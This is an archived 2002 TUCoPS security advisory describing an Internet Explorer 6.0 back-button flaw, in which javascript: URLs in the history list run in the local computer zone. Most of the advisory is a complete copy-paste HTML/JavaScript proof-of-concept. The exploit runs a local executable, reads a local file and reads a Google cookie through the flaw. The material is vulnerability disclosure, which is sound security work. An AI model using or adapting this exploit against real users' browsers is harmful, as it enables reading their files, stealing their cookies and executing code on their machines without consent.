Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Browsers :: expl5274.htm

Internet Explorer back button can cause execution of script from history URL's



17th Apr 2002 [SBWID-5274]
COMMAND

	IE back button can cause execution of script from history URL\'s

SYSTEMS AFFECTED

	IE 6.0 at least

PROBLEM

	In Andreas Sandblad [sandblad@acc.umu.se] post :
	

	IE allows urls containing the javascript protocol in the  history  list.
	Code injected in the url will operate in the  same  zone/domain  as  the
	last url viewed. The javascript url can be set to trigger  when  a  user
	presses the backbutton.
	

	The normal behaviour  when  a  page  fails  to  load  is  to  press  the
	backbutton. The error page  shown  by  IE  is  operating  in  the  local
	computer zone  (res://C:\\WINNT\\System32\\shdoclc.dll/dnserror.htm#  on
	Win2000). Thus, we can execute code and read local files.
	

	

	 EXPLOIT

	 =======

	

	The exploit works as follow: Press one of the links and  then  the  back
	button.
	

	Note: Exploit has only been tested on fully patched IE 6.0, with Win  XP
	and Win2000 pro (assume other OS are also vulnerable).  Winmine.exe  and
	test.txt must exist.
	

	--------------------------CUT HERE-------------------------------
	 

	<html>

	<h1>Press link and then the backbutton to trigger script.</h1>

	<a href=\"javascript:execFile(\'file:///c:/winnt/system32/winmine.exe\')\">

	Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)</a><br>

	<a href=\"javascript:execFile(\'file:///c:/windows/system32/winmine.exe\')\">

	Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)</a><br>

	<a href=\"javascript:readFile(\'file:///c:/test.txt\')\">

	Read c:\\test.txt (needs to be created)</a><br>

	<a href=\"javascript:readCookie(\'http://www.google.com/\')\">

	Read Google cookie</a>

	

	<script>

	// badUrl = \"http://www.nonexistingdomain.se\"; // Use if not XP

	badUrl = \"res:\";

	function execFile(file){

	  s = \'<object classid=CLSID:11111111-1111-1111-1111-111111111111 \';

	  s+= \'CODEBASE=\'+file+\'></OBJECT>\';

	  backBug(badUrl,s);

	}

	function readFile(file){

	  s = \'<iframe name=i src=\'+file+\' style=display:none onload=\';

	  s+= \'alert(i.document.body.innerText)></iframe>\';

	  backBug(badUrl,s);

	}

	function readCookie(url){

	  s = \'<script>alert(document.cookie);close();<\"+\"/script>\';

	  backBug(url,s);

	}

	function backBug(url,payload){

	  len = history.length;

	  page = document.location;

	  s = \"javascript:if (history.length!=\"+len+\") {\";

	  s+= \"open(\'javascript:document.write(\\\"\"+payload+\"\\\")\')\";

	  s+= \";history.back();} else \'<script>location=\\\"\"+url

	  s+= \"\\\";document.title=\\\"\"+page+\"\\\";<\"+\"/script>\';\";

	  location = s;

	}

	</script>

	</html>

	

	--------------------------CUT HERE-------------------------------
	

	

	 

	                                                   _     _

	                                                 o\' \\,=./ `o

	                                                    (o o)

	---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---

	

SOLUTION

	None yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH